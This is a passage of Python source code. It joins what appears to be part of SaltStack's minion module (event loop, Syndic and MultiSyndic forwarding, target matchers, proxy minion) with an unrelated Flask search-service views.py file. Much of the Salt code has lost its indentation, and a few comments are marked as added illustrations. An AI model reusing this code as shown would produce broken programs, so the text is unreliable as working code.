self.schedule.modify_job(name='__master_alive',
schedule=schedule)
elif package.startswith('_salt_error'):
tag, data = salt.utils.event.MinionEvent.unpack(package)
log.debug('Forwarding salt error event tag={tag}'.format(tag=tag))
self._fire_master(data, tag)
def _fallback_cleanups(self):
'''
Fallback cleanup routines, attempting to fix leaked processes, threads, etc.
'''
# Add an extra fallback in case a forked process leaks through
multiprocessing.active_children()
# Cleanup Windows threads
if not salt.utils.is_windows():
return
for thread in self.win_proc:
if not thread.is_alive():
thread.join()
try:
self.win_proc.remove(thread)
del thread
except (ValueError, NameError):
pass
# Main Minion Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the minion
:rtype : None
'''
self._pre_tune()
# Properly exit if a SIGTERM is signalled
signal.signal(signal.SIGTERM, self.clean_die)
# start up the event publisher, so we can see events during startup
self.event_publisher = salt.utils.event.AsyncEventPublisher(
self.opts,
self.handle_event,
io_loop=self.io_loop,
)
log.debug('Minion \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
self._fire_master_minion_start()
log.info('Minion is ready to receive requests!')
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
# Make sure to gracefully handle CTRL_LOGOFF_EVENT
salt.utils.enable_ctrl_logoff_handler()
# On first startup execute a state run if configured to do so
self._state_run()
loop_interval = self.opts['loop_interval']
try:
if self.opts['grains_refresh_every']: # If exists and is not zero. In minutes, not seconds!
if self.opts['grains_refresh_every'] > 1:
log.debug(
'Enabling the grains refresher. Will run every {0} minutes.'.format(
self.opts['grains_refresh_every'])
)
else: # Clean up minute vs. minutes in log message
log.debug(
'Enabling the grains refresher. Will run every {0} minute.'.format(
self.opts['grains_refresh_every'])
)
self._refresh_grains_watcher(
abs(self.opts['grains_refresh_every'])
)
except Exception as exc:
log.error(
'Exception occurred in attempt to initialize grain refresh routine during minion tune-in: {0}'.format(
exc)
)
self.periodic_callbacks = {}
# schedule the stuff that runs every interval
ping_interval = self.opts.get('ping_interval', 0) * 60
if ping_interval > 0:
def ping_master():
if not self._fire_master('ping', 'minion_ping'):
if not self.opts.get('auth_safemode', True):
log.error('** Master Ping failed. Attempting to restart minion**')
delay = self.opts.get('random_reauth_delay', 5)
log.info('delaying random_reauth_delay {0}s'.format(delay))
# regular sys.exit raises an exception -- which isn't sufficient in a thread
os._exit(salt.defaults.exitcodes.SALT_KEEPALIVE)
self.periodic_callbacks['ping'] = tornado.ioloop.PeriodicCallback(ping_master, ping_interval * 1000, io_loop=self.io_loop)
self.periodic_callbacks['cleanup'] = tornado.ioloop.PeriodicCallback(self._fallback_cleanups, loop_interval * 1000, io_loop=self.io_loop)
def handle_beacons():
# Process Beacons
            beacons = None
            try:
                beacons = self.process_beacons(self.functions)
            except Exception:
                log.critical('The beacon errored: ', exc_info=True)
            if beacons:
                self._fire_master(events=beacons)
self.periodic_callbacks['beacons'] = tornado.ioloop.PeriodicCallback(handle_beacons, loop_interval * 1000, io_loop=self.io_loop)
# TODO: actually listen to the return and change period
def handle_schedule():
self.process_schedule(self, loop_interval)
self.periodic_callbacks['schedule'] = tornado.ioloop.PeriodicCallback(handle_schedule, 1000, io_loop=self.io_loop)
# start all the other callbacks
for periodic_cb in six.itervalues(self.periodic_callbacks):
periodic_cb.start()
# add handler to subscriber
self.pub_channel.on_recv(self._handle_payload)
if start:
self.io_loop.start()
def _handle_payload(self, payload):
if payload is not None and self._target_load(payload['load']):
self._handle_decoded_payload(payload['load'])
def _target_load(self, load):
# Verify that the publication is valid
if 'tgt' not in load or 'jid' not in load or 'fun' not in load \
or 'arg' not in load:
return False
# Verify that the publication applies to this minion
# It's important to note that the master does some pre-processing
# to determine which minions to send a request to. So for example,
# a "salt -G 'grain_key:grain_val' test.ping" will invoke some
# pre-processing on the master and this minion should not see the
# publication if the master does not determine that it should.
if 'tgt_type' in load:
match_func = getattr(self.matcher,
'{0}_match'.format(load['tgt_type']), None)
if match_func is None:
return False
if load['tgt_type'] in ('grain', 'grain_pcre', 'pillar'):
delimiter = load.get('delimiter', DEFAULT_TARGET_DELIM)
if not match_func(load['tgt'], delimiter=delimiter):
return False
elif not match_func(load['tgt']):
return False
else:
if not self.matcher.glob_match(load['tgt']):
return False
return True
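    # Illustrative note (not part of the original source): a publication load
    # that passes the validity check above must carry at least 'tgt', 'jid',
    # 'fun' and 'arg'. A hypothetical grain-targeted publication might look like:
    #   {'tgt': 'os:Ubuntu', 'tgt_type': 'grain', 'jid': '20150101000000000000',
    #    'fun': 'test.ping', 'arg': [], 'delimiter': ':'}
    # With tgt_type 'grain' the getattr() lookup above resolves to
    # self.matcher.grain_match and the delimiter is forwarded; with no tgt_type
    # the target is glob-matched against the minion id. All field values here
    # are made up for illustration.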
def destroy(self):
'''
Tear down the minion
'''
self._running = False
if hasattr(self, 'pub_channel'):
self.pub_channel.on_recv(None)
del self.pub_channel
if hasattr(self, 'periodic_callbacks'):
for cb in six.itervalues(self.periodic_callbacks):
cb.stop()
def __del__(self):
self.destroy()
class Syndic(Minion):
'''
    Make a Syndic minion. This minion will use the minion keys on the
    master to authenticate with a higher level master.
'''
def __init__(self, opts, **kwargs):
self._syndic_interface = opts.get('interface')
self._syndic = True
        # force auth_safemode True because Syndic doesn't support autorestart
opts['auth_safemode'] = True
opts['loop_interval'] = 1
super(Syndic, self).__init__(opts, **kwargs)
self.mminion = salt.minion.MasterMinion(opts)
self.jid_forward_cache = set()
def _handle_decoded_payload(self, data):
'''
Override this method if you wish to handle the decoded data
differently.
'''
# TODO: even do this??
data['to'] = int(data.get('to', self.opts['timeout'])) - 1
# Only forward the command if it didn't originate from ourselves
if data.get('master_id', 0) != self.opts.get('master_id', 1):
self.syndic_cmd(data)
def syndic_cmd(self, data):
'''
Take the now clear load and forward it on to the client cmd
'''
# Set up default tgt_type
if 'tgt_type' not in data:
data['tgt_type'] = 'glob'
kwargs = {}
# optionally add a few fields to the publish data
for field in ('master_id', # which master the job came from
'user', # which user ran the job
):
if field in data:
kwargs[field] = data[field]
try:
# Send out the publication
self.local.pub(data['tgt'],
data['fun'],
data['arg'],
data['tgt_type'],
data['ret'],
data['jid'],
data['to'],
**kwargs)
except Exception as exc:
log.warning('Unable to forward pub data: {0}'.format(exc))
def _fire_master_syndic_start(self):
# Send an event to the master that the minion is live
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
'syndic_start'
)
self._fire_master(
'Syndic {0} started at {1}'.format(
self.opts['id'],
time.asctime()
),
tagify([self.opts['id'], 'start'], 'syndic'),
)
# Syndic Tune In
def tune_in(self, start=True):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
signal.signal(signal.SIGTERM, self.clean_die)
log.debug('Syndic \'{0}\' trying to tune in'.format(self.opts['id']))
if start:
self.sync_connect_master()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
self.local.opts['interface'] = self._syndic_interface
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Send an event to the master that the minion is live
self._fire_master_syndic_start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
if start:
self.io_loop.start()
# TODO: clean up docs
def tune_in_no_block(self):
'''
Executes the tune_in sequence but omits extra logging and the
management of the event bus assuming that these are handled outside
the tune_in sequence
'''
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
# add handler to subscriber
self.pub_channel.on_recv(self._process_cmd_socket)
def _process_cmd_socket(self, payload):
if payload is not None:
log.trace('Handling payload')
self._handle_decoded_payload(payload['load'])
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._fire_master(events=self.raw_events,
pretag=tagify(self.opts['id'], base='syndic'),
)
for jid in self.jids:
self._return_pub(self.jids[jid], '_syndic_return')
self._reset_event_aggregation()
def destroy(self):
'''
Tear down the syndic minion
'''
# We borrowed the local clients poller so give it back before
# it's destroyed. Reset the local poller reference.
super(Syndic, self).destroy()
if hasattr(self, 'local'):
del self.local
if hasattr(self, 'forward_events'):
self.forward_events.stop()
# TODO: consolidate syndic classes together?
# need a way of knowing if the syndic connection is busted
class MultiSyndic(MinionBase):
'''
    Make a MultiSyndic minion. This minion will relay jobs and returns from
    all minions connected to it to the list of masters it is connected to.
    Modes (controlled by `syndic_mode`):
        sync: This mode will synchronize all events and publishes from higher level masters
        cluster: This mode will only sync job publishes and returns
    Note: jobs will be returned best-effort to the requesting master. This also means
    (since we are using zmq) that if a job was fired and the master disconnects
    between the publish and return, the return will end up in a zmq buffer
    in this Syndic headed to that original master.
    In addition, since these classes all seem to use a mix of blocking and non-blocking
    calls (with varying timeouts along the way), this daemon does not handle failure well;
    it will (under most circumstances) stall for ~15s while trying to forward events
    to the downed master.
'''
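    # Illustrative note (not part of the original source): a MultiSyndic is
    # driven by a master config that lists several upstream masters, e.g.
    # (hypothetical values):
    #   master:
    #     - master1.example.com
    #     - master2.example.com
    #   syndic_mode: cluster        # or 'sync', the default used below
    # Each entry in 'master' gets its own Syndic instance via _spawn_syndics().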
# time to connect to upstream master
SYNDIC_CONNECT_TIMEOUT = 5
SYNDIC_EVENT_TIMEOUT = 5
def __init__(self, opts, io_loop=None):
opts['loop_interval'] = 1
super(MultiSyndic, self).__init__(opts)
self.mminion = salt.minion.MasterMinion(opts)
# sync (old behavior), cluster (only returns and publishes)
self.syndic_mode = self.opts.get('syndic_mode', 'sync')
self.auth_wait = self.opts['acceptance_wait_time']
self.max_auth_wait = self.opts['acceptance_wait_time_max']
self._has_master = threading.Event()
self.jid_forward_cache = set()
if io_loop is None:
self.io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
self.io_loop = io_loop
self.io_loop.install()
def _spawn_syndics(self):
'''
Spawn all the coroutines which will sign in the syndics
'''
self._syndics = {} # mapping of opts['master'] -> syndic
for master in set(self.opts['master']):
s_opts = copy.copy(self.opts)
s_opts['master'] = master
self._syndics[master] = self._connect_syndic(s_opts)
@tornado.gen.coroutine
def _connect_syndic(self, opts):
'''
Create a syndic, and asynchronously connect it to a master
'''
last = 0 # never have we signed in
auth_wait = opts['acceptance_wait_time']
while True:
log.debug('Syndic attempting to connect to {0}'.format(opts['master']))
try:
syndic = Syndic(opts,
timeout=self.SYNDIC_CONNECT_TIMEOUT,
safe=False,
io_loop=self.io_loop,
)
yield syndic.connect_master()
# set up the syndic to handle publishes (specifically not event forwarding)
syndic.tune_in_no_block()
log.info('Syndic successfully connected to {0}'.format(opts['master']))
break
except SaltClientError as exc:
log.error('Error while bringing up syndic for multi-syndic. Is master at {0} responding?'.format(opts['master']))
last = time.time()
if auth_wait < self.max_auth_wait:
auth_wait += self.auth_wait
yield tornado.gen.sleep(auth_wait) # TODO: log?
except KeyboardInterrupt:
raise
except: # pylint: disable=W0702
log.critical('Unexpected error while connecting to {0}'.format(opts['master']), exc_info=True)
raise tornado.gen.Return(syndic)
def _mark_master_dead(self, master):
'''
Mark a master as dead. This will start the sign-in routine
'''
# if its connected, mark it dead
if self._syndics[master].done():
            syndic = self._syndics[master].result()
syndic.destroy()
self._syndics[master] = self._connect_syndic(syndic.opts)
else:
log.info('Attempting to mark {0} as dead, although it is already marked dead'.format(master)) # TODO: debug?
def _call_syndic(self, func, args=(), kwargs=None, master_id=None):
'''
Wrapper to call a given func on a syndic, best effort to get the one you asked for
'''
if kwargs is None:
kwargs = {}
for master, syndic_future in self.iter_master_options(master_id):
if not syndic_future.done() or syndic_future.exception():
                log.error('Unable to call {0} on {1}, that syndic is not connected'.format(func, master))
continue
try:
getattr(syndic_future.result(), func)(*args, **kwargs)
return
except SaltClientError:
                log.error('Unable to call {0} on {1}, trying another...'.format(func, master))
self._mark_master_dead(master)
continue
log.critical('Unable to call {0} on any masters!'.format(func))
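    # Illustrative note (not part of the original source): _call_syndic is how
    # the event/return forwarding below fans work out to whichever upstream
    # master is usable. A hypothetical call such as
    #   self._call_syndic('_return_pub', args=(jid_ret, '_syndic_return'),
    #                     master_id='master1.example.com')
    # tries the requested master first (see iter_master_options below) and falls
    # back to the remaining masters, marking any that raise SaltClientError as
    # dead along the way.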
def iter_master_options(self, master_id=None):
'''
Iterate (in order) over your options for master
'''
masters = list(self._syndics.keys())
shuffle(masters)
if master_id not in self._syndics:
master_id = masters.pop(0)
else:
masters.remove(master_id)
while True:
yield master_id, self._syndics[master_id]
if len(masters) == 0:
break
master_id = masters.pop(0)
def _reset_event_aggregation(self):
self.jids = {}
self.raw_events = []
# Syndic Tune In
def tune_in(self):
'''
Lock onto the publisher. This is the main event loop for the syndic
'''
self._spawn_syndics()
# Instantiate the local client
self.local = salt.client.get_local_client(self.opts['_minion_conf_file'])
self.local.event.subscribe('')
log.debug('MultiSyndic \'{0}\' trying to tune in'.format(self.opts['id']))
# register the event sub to the poller
self._reset_event_aggregation()
self.local_event_stream = zmq.eventloop.zmqstream.ZMQStream(self.local.event.sub, io_loop=self.io_loop)
self.local_event_stream.on_recv(self._process_event)
# forward events every syndic_event_forward_timeout
self.forward_events = tornado.ioloop.PeriodicCallback(self._forward_events,
self.opts['syndic_event_forward_timeout'] * 1000,
io_loop=self.io_loop)
self.forward_events.start()
# Make sure to gracefully handle SIGUSR1
enable_sigusr1_handler()
self.io_loop.start()
def _process_event(self, raw):
# TODO: cleanup: Move down into event class
raw = raw[0]
mtag, data = self.local.event.unpack(raw, self.local.event.serial)
event = {'data': data, 'tag': mtag}
log.trace('Got event {0}'.format(event['tag']))
tag_parts = event['tag'].split('/')
if len(tag_parts) >= 4 and tag_parts[1] == 'job' and \
salt.utils.jid.is_jid(tag_parts[2]) and tag_parts[3] == 'ret' and \
'return' in event['data']:
if 'jid' not in event['data']:
# Not a job return
return
if self.syndic_mode == 'cluster' and event['data'].get('master_id', 0) == self.opts.get('master_id', 1):
                log.debug('Return received with matching master_id, not forwarding')
return
jdict = self.jids.setdefault(event['tag'], {})
if not jdict:
jdict['__fun__'] = event['data'].get('fun')
jdict['__jid__'] = event['data']['jid']
jdict['__load__'] = {}
fstr = '{0}.get_load'.format(self.opts['master_job_cache'])
# Only need to forward each load once. Don't hit the disk
# for every minion return!
if event['data']['jid'] not in self.jid_forward_cache:
jdict['__load__'].update(
self.mminion.returners[fstr](event['data']['jid'])
)
self.jid_forward_cache.add(event['data']['jid'])
if len(self.jid_forward_cache) > self.opts['syndic_jid_forward_cache_hwm']:
# Pop the oldest jid from the cache
tmp = sorted(list(self.jid_forward_cache))
tmp.pop(0)
self.jid_forward_cache = set(tmp)
if 'master_id' in event['data']:
# __'s to make sure it doesn't print out on the master cli
jdict['__master_id__'] = event['data']['master_id']
jdict[event['data']['id']] = event['data']['return']
else:
# TODO: config to forward these? If so we'll have to keep track of who
# has seen them
# if we are the top level masters-- don't forward all the minion events
if self.syndic_mode == 'sync':
# Add generic event aggregation here
if 'retcode' not in event['data']:
self.raw_events.append(event)
def _forward_events(self):
log.trace('Forwarding events')
if self.raw_events:
self._call_syndic('_fire_master',
kwargs={'events': self.raw_events,
'pretag': tagify(self.opts['id'], base='syndic'),
'timeout': self.SYNDIC_EVENT_TIMEOUT,
},
)
for jid, jid_ret in self.jids.items():
self._call_syndic('_return_pub',
args=(jid_ret, '_syndic_return'),
kwargs={'timeout': self.SYNDIC_EVENT_TIMEOUT},
master_id=jid_ret.get('__master_id__'),
)
self._reset_event_aggregation()
class Matcher(object):
'''
Use to return the value for matching calls from the master
'''
def __init__(self, opts, functions=None):
self.opts = opts
self.functions = functions
def confirm_top(self, match, data, nodegroups=None):
'''
Takes the data passed to a top file environment and determines if the
data matches this minion
'''
matcher = 'compound'
if not data:
log.error('Received bad data when setting the match from the top '
'file')
return False
for item in data:
if isinstance(item, dict):
if 'match' in item:
matcher = item['match']
if hasattr(self, matcher + '_match'):
funcname = '{0}_match'.format(matcher)
if matcher == 'nodegroup':
return getattr(self, funcname)(match, nodegroups)
return getattr(self, funcname)(match)
else:
log.error('Attempting to match with unknown matcher: {0}'.format(
matcher
))
return False
def glob_match(self, tgt):
'''
Returns true if the passed glob matches the id
'''
if not isinstance(tgt, six.string_types):
return False
return fnmatch.fnmatch(self.opts['id'], tgt)
def pcre_match(self, tgt):
'''
Returns true if the passed pcre regex matches
'''
return bool(re.match(tgt, self.opts['id']))
def list_match(self, tgt):
'''
Determines if this host is on the list
'''
if isinstance(tgt, six.string_types):
tgt = tgt.split(',')
return bool(self.opts['id'] in tgt)
def grain_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the grains glob match
'''
log.debug('grains target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['grains'], tgt, delimiter=delimiter
)
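    # Illustrative note (not part of the original source): a hypothetical grain
    # target such as 'os:Ubu*' (with the default ':' delimiter) asks
    # salt.utils.subdict_match to glob-match grains['os'] against 'Ubu*';
    # nested grains are addressed by chaining keys, e.g. 'systemd:version:219'.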
def grain_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Matches a grain based on regex
'''
log.debug('grains pcre target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for grains pcre match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['grains'], tgt,
delimiter=delimiter, regex_match=True)
def data_match(self, tgt):
'''
Match based on the local data store on the minion
'''
if self.functions is None:
utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=utils)
comps = tgt.split(':')
if len(comps) < 2:
return False
val = self.functions['data.getval'](comps[0])
if val is None:
# The value is not defined
return False
if isinstance(val, list):
# We are matching a single component to a single list member
for member in val:
if fnmatch.fnmatch(str(member).lower(), comps[1].lower()):
return True
return False
if isinstance(val, dict):
if comps[1] in val:
return True
return False
return bool(fnmatch.fnmatch(
val,
comps[1],
))
def pillar_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar glob match
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter
)
def pillar_pcre_match(self, tgt, delimiter=DEFAULT_TARGET_DELIM):
'''
Reads in the pillar pcre match
'''
log.debug('pillar PCRE target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar PCRE match '
'statement from master')
return False
return salt.utils.subdict_match(
self.opts['pillar'], tgt, delimiter=delimiter, regex_match=True
)
def pillar_exact_match(self, tgt, delimiter=':'):
'''
Reads in the pillar match, no globbing, no PCRE
'''
log.debug('pillar target: {0}'.format(tgt))
if delimiter not in tgt:
log.error('Got insufficient arguments for pillar match '
'statement from master')
return False
return salt.utils.subdict_match(self.opts['pillar'],
tgt,
delimiter=delimiter,
exact_match=True)
def ipcidr_match(self, tgt):
'''
Matches based on IP address or CIDR notation
'''
try:
tgt = ipaddress.ip_network(tgt)
# Target is a network
proto = 'ipv{0}'.format(tgt.version)
if proto not in self.opts['grains']:
return False
else:
return salt.utils.network.in_subnet(tgt, self.opts['grains'][proto])
except: # pylint: disable=bare-except
try:
# Target should be an address
proto = 'ipv{0}'.format(ipaddress.ip_address(tgt).version)
if proto not in self.opts['grains']:
return False
else:
return tgt in self.opts['grains'][proto]
except: # pylint: disable=bare-except
                log.error('Invalid IP/CIDR target {0}'.format(tgt))
return False
def range_match(self, tgt):
'''
Matches based on range cluster
'''
if HAS_RANGE:
range_ = seco.range.Range(self.opts['range_server'])
try:
return self.opts['grains']['fqdn'] in range_.expand(tgt)
except seco.range.RangeException as exc:
log.debug('Range exception in compound match: {0}'.format(exc))
return False
return False
def compound_match(self, tgt):
'''
Runs the compound target check
'''
if not isinstance(tgt, six.string_types) and not isinstance(tgt, (list, tuple)):
log.error('Compound target received that is neither string, list nor tuple')
return False
log.debug('compound_match: {0} ? {1}'.format(self.opts['id'], tgt))
ref = {'G': 'grain',
'P': 'grain_pcre',
'I': 'pillar',
'J': 'pillar_pcre',
'L': 'list',
'N': None, # Nodegroups should already be expanded
'S': 'ipcidr',
'E': 'pcre'}
if HAS_RANGE:
ref['R'] = 'range'
results = []
opers = ['and', 'or', 'not', '(', ')']
if isinstance(tgt, six.string_types):
words = tgt.split()
else:
words = tgt
for word in words:
target_info = salt.utils.minions.parse_target(word)
# Easy check first
if word in opers:
if results:
if results[-1] == '(' and word in ('and', 'or'):
log.error('Invalid beginning operator after "(": {0}'.format(word))
return False
if word == 'not':
                        if results[-1] not in ('and', 'or', '('):
results.append('and')
results.append(word)
else:
# seq start with binary oper, fail
if word not in ['(', 'not']:
log.error('Invalid beginning operator: {0}'.format(word))
return False
results.append(word)
elif target_info and target_info['engine']:
if 'N' == target_info['engine']:
# Nodegroups should already be expanded/resolved to other engines
log.error('Detected nodegroup expansion failure of "{0}"'.format(word))
return False
engine = ref.get(target_info['engine'])
if not engine:
# If an unknown engine is called at any time, fail out
log.error('Unrecognized target engine "{0}" for'
' target expression "{1}"'.format(
target_info['engine'],
word,
)
)
return False
engine_args = [target_info['pattern']]
engine_kwargs = {}
if target_info['delimiter']:
engine_kwargs['delimiter'] = target_info['delimiter']
results.append(
str(getattr(self, '{0}_match'.format(engine))(*engine_args, **engine_kwargs))
)
else:
# The match is not explicitly defined, evaluate it as a glob
results.append(str(self.glob_match(word)))
results = ' '.join(results)
log.debug('compound_match {0} ? "{1}" => "{2}"'.format(self.opts['id'], tgt, results))
try:
return eval(results) # pylint: disable=W0123
except Exception:
log.error('Invalid compound target: {0} for results: {1}'.format(tgt, results))
return False
return False
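    # Illustrative note (not part of the original source): a hypothetical
    # compound target such as
    #   'webserver* and G@os:Ubuntu and not L@web03,web04'
    # is split into words above; prefixed words are dispatched through the ref
    # table (G -> grain_match, L -> list_match, ...), bare words fall back to
    # glob_match, and the resulting string of 'True'/'False' tokens and
    # operators is handed to eval() to produce the final boolean.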
def nodegroup_match(self, tgt, nodegroups):
'''
This is a compatibility matcher and is NOT called when using
nodegroups for remote execution, but is called when the nodegroups
matcher is used in states
'''
if tgt in nodegroups:
return self.compound_match(
salt.utils.minions.nodegroup_comp(tgt, nodegroups)
)
return False
class ProxyMinion(Minion):
'''
This class instantiates a 'proxy' minion--a minion that does not manipulate
the host it runs on, but instead manipulates a device that cannot run a minion.
'''
# TODO: better name...
@tornado.gen.coroutine
def _post_master_init(self, master):
'''
Function to finish init after connecting to a master
This is primarily loading modules, pillars, etc. (since they need
to know which master they connected to)
'''
log.debug("subclassed _post_master_init")
self.opts['master'] = master
self.opts['pillar'] = yield salt.pillar.get_async_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
).compile_pillar()
if 'proxy' not in self.opts['pillar']:
log.error('No proxy key found in pillar for id '+self.opts['id']+'.')
log.error('Check your pillar configuration and contents. Salt-proxy aborted.')
self._running = False
raise SaltSystemExit(code=-1)
fq_proxyname = self.opts['pillar']['proxy']['proxytype']
self.opts['proxy'] = self.opts['pillar']['proxy']
# We need to do this again, because we are going to throw out a lot of grains.
self.opts['grains'] = salt.loader.grains(self.opts)
self.opts['proxymodule'] = salt.loader.proxy(self.opts, None, loaded_base_name=fq_proxyname)
self.functions, self.returners, self.function_errors, self.executors = self._load_modules()
proxy_fn = self.opts['proxymodule'].loaded_base_name + '.init'
self.opts['proxymodule'][proxy_fn](self.opts)
self.serial = salt.payload.Serial(self.opts)
self.mod_opts = self._prep_mod_opts()
self.matcher = Matcher(self.opts, self.functions)
self.beacons = salt.beacons.Beacon(self.opts, self.functions)
uid = salt.utils.get_uid(user=self.opts.get('user', None))
self.proc_dir = get_proc_dir(self.opts['cachedir'], uid=uid)
self.schedule = salt.utils.schedule.Schedule(
self.opts,
self.functions,
self.returners)
# add default scheduling jobs to the minions scheduler
if 'mine.update' in self.functions:
log.info('Added mine.update to scheduler')
self.schedule.add_job({
'__mine_interval':
{
'function': 'mine.update',
'minutes': self.opts['mine_interval'],
'jid_include': True,
'maxrunning': 2
}
}, persist=True)
# add master_alive job if enabled
if self.opts['master_alive_interval'] > 0:
self.schedule.add_job({
'__master_alive':
{
'function': 'status.master',
'seconds': self.opts['master_alive_interval'],
'jid_include': True,
'maxrunning': 1,
'kwargs': {'master': self.opts['master'],
'connected': True}
}
}, persist=True)
self.grains_cache = self.opts['grains']
|
views.py
|
from flask import request
from flask_cors import CORS, cross_origin
from datetime import datetime, timezone
from functools import wraps
import threading, json, time, uuid
from googletrans import Translator
from AuthModule.azuread import authProvider
from SearchModule import app
from SearchModule.TextSearchModule import loadModel, refreshModel, freeModel, loaded_models
from SearchModule.Utilities import resourceConfig, getProductId, getAllProductIds
from SearchModule.StorageAccountHelper import StorageAccountHelper
from SearchModule.Logger import loggerInstance
translator = Translator()
######## RUN THE API SERVER IN FLASK #############
def getUTCTime():
return datetime.now(timezone.utc)
def getLatency(startTime, endTime):
return (endTime-startTime).total_seconds()*1000
def getRequestId(req):
if req.method == 'POST':
data = json.loads(request.data.decode('utf-8'))
return data['requestId'] if 'requestId' in data else None
elif req.method == 'GET':
return request.args.get('requestId')
return None
def loggingProvider(requestIdRequired=True):
def loggingOuter(f):
@wraps(f)
def logger(*args, **kwargs):
startTime = getUTCTime()
res = None
try:
requestId = getRequestId(request)
except Exception as e:
exceptionMessage = "Failed to parse request to get requestId: {0}".format(str(e))
loggerInstance.logUnhandledException("ErrorRequestId", exceptionMessage)
return (exceptionMessage, 500)
requestId = requestId if requestId else (str(uuid.uuid4()) if not requestIdRequired else None)
if not requestId:
res = ("BadRequest: Missing parameter requestId", 400)
endTime = getUTCTime()
loggerInstance.logApiSummary("Null", str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
else:
try:
res = f(*args, **kwargs)
except Exception as e:
res = (str(e), 500)
loggerInstance.logUnhandledException(requestId, str(e))
endTime = getUTCTime()
if res:
loggerInstance.logApiSummary(requestId, str(request.url_rule), res[1], getLatency(startTime, endTime), startTime.strftime("%H:%M:%S.%f"), endTime.strftime("%H:%M:%S.%f"), res[0])
return res
return logger
return loggingOuter
# App routes
cors = CORS(app)
app.config.from_object("AppConfig.ProductionConfig")
app.config['CORS_HEADERS'] = 'Content-Type'
@app.before_first_request
def activate_job():
if app.config['MODEL_SYNC_ENABLED']:
productIds = getAllProductIds(resourceConfig)
sah = StorageAccountHelper(loggerInstance)
loggerInstance.logInsights("Starting model sync for {0}".format(','.join(productIds)))
thread = threading.Thread(target=sah.watchModels, args=(productIds,))
thread.start()
while True:
modelDownloadPending = [sah.firstTime[productId] if productId in sah.firstTime else True for productId in productIds]
if any(modelDownloadPending):
time.sleep(2)
else:
break
loggerInstance.logInsights("Search service startup succeeded")
@app.route('/healthping')
@cross_origin()
def healthPing():
return ("I am alive!", 200)
@app.route('/queryDetectors', methods=["POST"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def queryDetectorsMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = translator.translate(data['text']).text
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
return (json.dumps({"query": txt_data, "results": [], "exception": str(e)}), 404)
results = loaded_models[productid].queryDetectors(txt_data)
res = json.dumps(results)
return (res, 200)
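# Illustrative note (not part of the original source): /queryDetectors expects a
# JSON POST body roughly along these lines (all values hypothetical), plus
# whatever credentials authProvider() requires:
#   {"requestId": "2f6c0c6e-...", "text": "app keeps restarting",
#    ... resource fields consumed by getProductId(...) ...}
# The text is machine-translated to English before the per-product model is
# loaded and queried.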
@app.route('/queryMultiple', methods=["POST"])
def queryMultipleMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txts = data['texts']
if not txts:
return ("No texts provided for search", 400)
